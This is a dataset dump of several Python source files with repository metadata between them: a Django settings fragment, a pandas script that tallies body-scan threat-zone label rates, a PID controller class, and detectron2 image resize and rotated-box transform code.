# https://docs.djangoproject.com/en/1.6/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/

STATIC_URL = '/static/'
|
[
"mooc-31@mooc31-desktop.(none)"
] |
mooc-31@mooc31-desktop.(none)
|
c0f5e0bed69f86c5eb7a5a3b2e9c90fbb6ca1dd9
|
3c066b3e449d6a8efd3a165955d3176ef08d9180
|
/analyze_input_threat_count.py
|
17ffdff7f208ec277a19b75969737758d0dd3f2d
|
[] |
no_license
|
InceptAi/body_scan
|
bf30b47b2fcc0e4a1fb04d3cb89f57f38f76b8ee
|
53bda38417f0223dcad8ccbad019c05a9fa42267
|
refs/heads/master
| 2021-03-24T09:43:25.441415
| 2017-12-14T01:06:45
| 2017-12-14T01:06:45
| 112,533,990
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,903
|
py
|
from myimports import *
#----------------------------------------------------------------------------------------
# get_hit_rate_stats(infile): gets the threat probabilities in a useful form
#
# infile: labels csv file
#
# returns: a dataframe of the summary hit probabilities
#
#----------------------------------------------------------------------------------------
def get_hit_rate_stats(infile):
    """Read a threat-labels CSV and return a per-zone hit-rate summary.

    Args:
        infile: path to a CSV with columns ``Id`` (formatted
            "<subject>_<zone>") and ``Probability`` (the threat label).

    Returns:
        DataFrame indexed by zone with columns ``sum``, ``count``, ``Zone``
        and ``pct`` (= sum/count), sorted by ``pct`` descending.

    Fix: the original tuple-unpacked the ``.str`` accessor
    (``df['Id'].str.split('_',1).str``), which relies on StringMethods
    iteration that modern pandas no longer supports; ``expand=True`` with
    keyword ``n=1`` produces the two columns directly.
    """
    # pull the labels for a given patient
    df = pd.read_csv(infile)

    # Separate the subject and zone ids into their own columns.
    parts = df['Id'].str.split('_', n=1, expand=True)
    df['Subject'] = parts[0]
    df['Zone'] = parts[1]
    df = df[['Subject', 'Zone', 'Probability']]

    # Sum and count probabilities per zone, derive the hit rate, sort
    # highest-rate zones first.
    df_summary = df.groupby('Zone')['Probability'].agg(['sum', 'count'])
    df_summary['Zone'] = df_summary.index
    df_summary['pct'] = df_summary['sum'] / df_summary['count']
    df_summary.sort_values('pct', axis=0, ascending=False, inplace=True)

    return df_summary
# unit test -----------------------
#df = get_hit_rate_stats(THREAT_LABELS)
#df.head()
#------------------------------------------------------------------------------------------
# chart_hit_rate_stats(df_summary): charts threat probabilities in desc order by zone
#
# df_summary: a dataframe like that returned from get_hit_rate_stats(...)
#
#-------------------------------------------------------------------------------------------
def chart_hit_rate_stats(df_summary):
    """Bar-chart the hit percentage per zone.

    df_summary: DataFrame as returned by get_hit_rate_stats (columns
    'Zone' and 'pct'). The figure is created but only displayed if the
    commented-out plt.show() is re-enabled.
    """
    fig, ax = plt.subplots(figsize=(15,5))
    sns.barplot(ax=ax, x=df_summary['Zone'], y=df_summary['pct']*100)
    #plt.show()
# unit test ------------------
#chart_hit_rate_stats(df)
#------------------------------------------------------------------------------------------
# print_hit_rate_stats(df_summary): lists threat probabilities by zone
#
# df_summary: a dataframe like that returned from get_hit_rate_stats(...)
#
#------------------------------------------------------------------------------------------
def print_hit_rate_stats(df_summary):
    """Print per-zone hit counts and percentages as a fixed-width table,
    followed by an overall total row.

    df_summary: DataFrame as returned by get_hit_rate_stats (columns
    'sum', 'count', 'pct', indexed by zone).
    """
    # print the table of values readably
    print ('{:6s} {:>4s} {:6s}'.format('Zone', 'Hits', 'Pct %'))
    print ('------ ----- ----------')
    for zone in df_summary.iterrows():
        # zone is a (index_label, row Series) pair.
        # NOTE(review): np.int16 silently overflows above 32767 hits.
        print ('{:6s} {:>4d} {:>6.3f}%'.format(zone[0], np.int16(zone[1]['sum']), zone[1]['pct']*100))
    print ('------ ----- ----------')
    print ('{:6s} {:>4d} {:6.3f}%'.format('Total ', np.int16(df_summary['sum'].sum(axis=0)),
           ( df_summary['sum'].sum(axis=0) / df_summary['count'].sum(axis=0))*100))
# unit test -----------------------
#print_hit_rate_stats(df)

# Script entry: THREAT_LABELS (the labels CSV path) comes from `myimports`.
print (THREAT_LABELS)
df = get_hit_rate_stats(THREAT_LABELS)
#print (df)
print_hit_rate_stats(df)
#df.head()
#chart_hit_rate_stats(df)
|
[
"vivek@obiai.tech"
] |
vivek@obiai.tech
|
389fbf646a8335c9d4c2531567cf425f231c28a5
|
fc6b692ff0e25bae6d451f3f7d3ac8ee71fb940f
|
/code/pid.py
|
352ed547c9d8a7f75b4b3976eb5ec291dde32ba6
|
[] |
no_license
|
dp12/RoboND-Rover-Project-1
|
b5bdd81d1dfba62051f58de4c80a644d5ea2867a
|
4ecde978e2f189c8247407a9a986eb376dae6894
|
refs/heads/master
| 2021-01-23T09:09:56.188726
| 2017-12-26T07:31:37
| 2017-12-26T07:31:37
| 102,562,204
| 0
| 0
| null | 2017-09-06T04:21:34
| 2017-09-06T04:21:34
| null |
UTF-8
|
Python
| false
| false
| 751
|
py
|
class Pid():
    """
    Discrete PID controller tracking a fixed set point.

    Gains:
        kp: proportional gain
        ki: integral gain (applied to the running sum of errors)
        kd: derivative gain (applied to the error delta between updates)
    """

    def __init__(self, kp = 0.0, ki = 0.0, kd = 0.0, set_point = 0):
        self.kp = kp
        self.ki = ki
        self.kd = kd
        self.set_point = set_point
        # Running sum of errors (integral term state).
        self.integrated_error = 0.0
        # Previous error, used for the derivative term.
        self.last_error = 0.0

    def update(self, measurement):
        """Return the control output u for the latest measurement."""
        error = self.set_point - measurement
        # Accumulate the integral state and compute the one-step derivative.
        self.integrated_error += error
        delta = error - self.last_error
        self.last_error = error
        proportional = self.kp * error
        integral = self.ki * self.integrated_error
        derivative = self.kd * delta
        return proportional + integral + derivative
|
[
"dp12@github.com"
] |
dp12@github.com
|
9aaf4826bfa48578629394a3c6e020212e9d6a04
|
d8010fd033ec0b36a87d9a058487d738befc3c17
|
/detectron2/data/transforms/transform.py
|
c8fb7e03d589939ea01c8388c2d4128d3f7a2cf2
|
[] |
no_license
|
bobwan1995/ReIR-WeaklyGrounding.pytorch
|
0efa0a616b18f9fa3d89f0afde1a6528efca1a8d
|
2a962c335541c981149a042794ee508e0e7226f4
|
refs/heads/main
| 2023-08-11T12:55:42.977775
| 2021-10-09T00:25:15
| 2021-10-09T00:25:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,003
|
py
|
# -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# File: transform.py
import numpy as np
from fvcore.transforms.transform import HFlipTransform, NoOpTransform, Transform
from PIL import Image
__all__ = ["ExtentTransform", "ResizeTransform"]
class ExtentTransform(Transform):
    """
    Extracts a subregion from the source image and scales it to the output size.
    The fill color is used to map pixels from the source rect that fall outside
    the source image.

    See: https://pillow.readthedocs.io/en/latest/PIL.html#PIL.ImageTransform.ExtentTransform
    """

    # NOTE: the default is Image.BILINEAR instead of the historical Image.LINEAR;
    # LINEAR is a deprecated alias with the identical value, removed in Pillow 10,
    # so this keeps the same behavior while staying importable on new Pillow.
    def __init__(self, src_rect, output_size, interp=Image.BILINEAR, fill=0):
        """
        Args:
            src_rect (x0, y0, x1, y1): src coordinates
            output_size (h, w): dst image size
            interp: PIL interpolation methods
            fill: Fill color used when src_rect extends outside image
        """
        super().__init__()
        # Transform._set_attributes stores each constructor argument on self.
        self._set_attributes(locals())

    def apply_image(self, img, interp=None):
        """Crop self.src_rect out of img and rescale it to self.output_size."""
        h, w = self.output_size
        ret = Image.fromarray(img).transform(
            size=(w, h),
            method=Image.EXTENT,
            data=self.src_rect,
            resample=interp if interp else self.interp,
            fill=self.fill,
        )
        return np.asarray(ret)

    def apply_coords(self, coords):
        """Map Nx2 (x, y) coordinates from source space into output space."""
        # Transform image center from source coordinates into output coordinates
        # and then map the new origin to the corner of the output image.
        h, w = self.output_size
        x0, y0, x1, y1 = self.src_rect
        new_coords = coords.astype(np.float32)
        new_coords[:, 0] -= 0.5 * (x0 + x1)
        new_coords[:, 1] -= 0.5 * (y0 + y1)
        new_coords[:, 0] *= w / (x1 - x0)
        new_coords[:, 1] *= h / (y1 - y0)
        new_coords[:, 0] += 0.5 * w
        new_coords[:, 1] += 0.5 * h
        return new_coords

    def apply_segmentation(self, segmentation):
        """Apply the same extent crop with nearest-neighbor so label ids stay discrete."""
        segmentation = self.apply_image(segmentation, interp=Image.NEAREST)
        return segmentation
class ResizeTransform(Transform):
    """
    Resize the image to (new_h, new_w), then zero-pad it to a square of side
    max(new_h, new_w) with the resized content centered.
    """

    def __init__(self, h, w, new_h, new_w, interp):
        """
        Args:
            h, w (int): original image size
            new_h, new_w (int): new image size
            interp: PIL interpolation methods
        """
        # TODO decide on PIL vs opencv
        super().__init__()
        self._set_attributes(locals())

    def apply_image(self, img, interp=None):
        # Resize with PIL, then center-pad to a square canvas via apply_padding.
        assert img.shape[:2] == (self.h, self.w)
        pil_image = Image.fromarray(img)
        interp_method = interp if interp is not None else self.interp
        pil_image = pil_image.resize((self.new_w, self.new_h), interp_method)
        ret = np.asarray(pil_image)
        ret = self.apply_padding(ret, True)
        return ret

    def apply_padding(self, data, is_img=False):
        # Center `data` on a square zero-filled canvas of side max(new_h, new_w).
        # NOTE(review): np.zeros defaults to float64, so the padded result's
        # dtype differs from the input's (e.g. uint8 images become float) --
        # confirm downstream code expects this.
        max_size = max(self.new_h, self.new_w)
        if is_img:
            new_data = np.zeros((max_size, max_size, data.shape[2]))
        else:
            new_data = np.zeros((max_size, max_size))
        # Centering offsets; np.floor on a non-negative int is a no-op here,
        # so these are effectively (max_size - new_h) // 2 and (max_size - new_w) // 2.
        pad_h = int(np.floor(max_size-self.new_h)/2)
        pad_w = int(np.floor(max_size-self.new_w)/2)
        new_data[pad_h:pad_h+self.new_h, pad_w:pad_w+self.new_w, ...] = data
        return new_data

    def apply_coords(self, coords):
        # Scale Nx2 (x, y) coordinates by the resize factors, in place.
        # NOTE(review): apply_image/apply_segmentation additionally center-pad
        # the output, but no pad_w/pad_h offset is added here -- coordinates
        # appear shifted relative to the padded image unless the offset is
        # compensated elsewhere. Verify against callers.
        coords[:, 0] = coords[:, 0] * (self.new_w * 1.0 / self.w)
        coords[:, 1] = coords[:, 1] * (self.new_h * 1.0 / self.h)
        return coords

    def apply_segmentation(self, segmentation):
        # Nearest-neighbor resize keeps discrete label values intact, then pad.
        assert segmentation.shape[:2] == (self.h, self.w)
        pil_image = Image.fromarray(segmentation)
        interp_method = Image.NEAREST
        pil_image = pil_image.resize((self.new_w, self.new_h), interp_method)
        segmentation = np.asarray(pil_image)
        segmentation = self.apply_padding(segmentation, False)
        return segmentation
def HFlip_rotated_box(transform, rotated_boxes):
    """
    Apply the horizontal flip transform on rotated boxes, in place.

    Args:
        transform: a transform exposing `width` (flipped image width).
        rotated_boxes (ndarray): Nx5 floating point array of
            (x_center, y_center, width, height, angle_degrees) format
            in absolute coordinates.

    Returns:
        The same ndarray, mutated.
    """
    # Mirror the box center across the vertical midline of the image.
    rotated_boxes[:, 0] = transform.width - rotated_boxes[:, 0]
    # A horizontal flip reverses the rotation direction, so negate the angle.
    rotated_boxes[:, 4] *= -1
    return rotated_boxes
def Resize_rotated_box(transform, rotated_boxes):
    """
    Apply a resize transform to rotated boxes, in place.

    Args:
        transform: a resize transform exposing `w`, `h` (original size) and
            `new_w`, `new_h` (target size).
        rotated_boxes (ndarray): Nx5 floating point array of
            (x_center, y_center, width, height, angle_degrees) format
            in absolute coordinates.

    Returns:
        The same ndarray, mutated, with centers scaled and width/height/angle
        fitted to the anisotropically-scaled shape (see derivation below).
    """
    # Note: when scale_factor_x != scale_factor_y,
    # the rotated box does not preserve the rectangular shape when the angle
    # is not a multiple of 90 degrees under resize transformation.
    # Instead, the shape is a parallelogram (that has skew)
    # Here we make an approximation by fitting a rotated rectangle to the
    # parallelogram that shares the same midpoints on the left and right edge
    scale_factor_x = transform.new_w * 1.0 / transform.w
    scale_factor_y = transform.new_h * 1.0 / transform.h
    rotated_boxes[:, 0] *= scale_factor_x
    rotated_boxes[:, 1] *= scale_factor_y
    theta = rotated_boxes[:, 4] * np.pi / 180.0
    c = np.cos(theta)
    s = np.sin(theta)
    # In image space, y is top->down and x is left->right
    # Consider the local coordintate system for the rotated box,
    # where the box center is located at (0, 0), and the four vertices ABCD are
    # A(-w / 2, -h / 2), B(w / 2, -h / 2), C(w / 2, h / 2), D(-w / 2, h / 2)
    # the midpoint of the left edge AD of the rotated box E is:
    # E = (A+D)/2 = (-w / 2, 0)
    # the midpoint of the top edge AB of the rotated box F is:
    # F(0, -h / 2)
    # To get the old coordinates in the global system, apply the rotation transformation
    # (Note: the right-handed coordinate system for image space is yOx):
    # (old_x, old_y) = (s * y + c * x, c * y - s * x)
    # E(old) = (s * 0 + c * (-w/2), c * 0 - s * (-w/2)) = (-c * w / 2, s * w / 2)
    # F(old) = (s * (-h / 2) + c * 0, c * (-h / 2) - s * 0) = (-s * h / 2, -c * h / 2)
    # After applying the scaling factor (sfx, sfy):
    # E(new) = (-sfx * c * w / 2, sfy * s * w / 2)
    # F(new) = (-sfx * s * h / 2, -sfy * c * h / 2)
    # The new width after scaling tranformation becomes:
    # w(new) = |E(new) - O| * 2
    #        = sqrt[(sfx * c * w / 2)^2 + (sfy * s * w / 2)^2] * 2
    #        = sqrt[(sfx * c)^2 + (sfy * s)^2] * w
    # i.e., scale_factor_w = sqrt[(sfx * c)^2 + (sfy * s)^2]
    #
    # For example,
    # when angle = 0 or 180, |c| = 1, s = 0, scale_factor_w == scale_factor_x;
    # when |angle| = 90, c = 0, |s| = 1, scale_factor_w == scale_factor_y
    rotated_boxes[:, 2] *= np.sqrt(np.square(scale_factor_x * c) + np.square(scale_factor_y * s))
    # h(new) = |F(new) - O| * 2
    #        = sqrt[(sfx * s * h / 2)^2 + (sfy * c * h / 2)^2] * 2
    #        = sqrt[(sfx * s)^2 + (sfy * c)^2] * h
    # i.e., scale_factor_h = sqrt[(sfx * s)^2 + (sfy * c)^2]
    #
    # For example,
    # when angle = 0 or 180, |c| = 1, s = 0, scale_factor_h == scale_factor_y;
    # when |angle| = 90, c = 0, |s| = 1, scale_factor_h == scale_factor_x
    rotated_boxes[:, 3] *= np.sqrt(np.square(scale_factor_x * s) + np.square(scale_factor_y * c))
    # The angle is the rotation angle from y-axis in image space to the height
    # vector (top->down in the box's local coordinate system) of the box in CCW.
    #
    # angle(new) = angle_yOx(O - F(new))
    #            = angle_yOx( (sfx * s * h / 2, sfy * c * h / 2) )
    #            = atan2(sfx * s * h / 2, sfy * c * h / 2)
    #            = atan2(sfx * s, sfy * c)
    #
    # For example,
    # when sfx == sfy, angle(new) == atan2(s, c) == angle(old)
    rotated_boxes[:, 4] = np.arctan2(scale_factor_x * s, scale_factor_y * c) * 180 / np.pi
    return rotated_boxes
# Register rotated-box handlers on the fvcore transform classes so that
# transform.apply_rotated_box(boxes) dispatches to the functions above.
# NoOpTransform leaves boxes unchanged by construction.
HFlipTransform.register_type("rotated_box", HFlip_rotated_box)
NoOpTransform.register_type("rotated_box", lambda t, x: x)
ResizeTransform.register_type("rotated_box", Resize_rotated_box)
|
[
"liuyf3@shanghaitech.edu.cn"
] |
liuyf3@shanghaitech.edu.cn
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.